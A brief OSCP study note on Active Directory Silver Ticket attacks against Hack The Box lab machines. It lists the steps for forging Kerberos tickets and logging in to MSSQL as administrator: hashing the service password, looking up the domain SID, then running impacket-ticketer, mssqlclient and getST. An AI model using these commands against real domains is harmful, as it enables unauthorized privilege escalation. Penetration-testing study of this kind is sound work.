// notes/ Active Directory
🏛️
Post Compromise Attacks Silver Ticket
{% hint style="info" %}
#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-attacks_silver-ticket ↗Silver Ticket
{% hint style="info" %} The username and password of the service account is needed for this attack {% endhint %}
Create a NTLM hash of the password
{% embed url="https://codebeautify.org/ntlm-hash-generator" %}
code
011443EC19DA4DAC4FFC953BCA1B57B4CFNext you need the Domains SID
code
01*Evil-WinRM* PS C:\SQLSERVER\Logs> Get-ADDomaincode
01S-1-5-21-4078382237-1492182817-2568127209Create the ticket and connect with to mssql
code
01impacket-ticketer -nthash <hash> -domain-sid <SID> -domain sequel.htb -spn Adot8/dc.sequel.htb administratorcode
01KRB5CCNAME=administrator.ccache impacket-mssqlclient -k administrator@dc.sequel.htbOR
impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$:pass -dc-ip 192.168.193.40
{% embed url="https://htb.adot8.com/hack-the-box/oscp-like-boxes/windows/intelligence/foothold" %}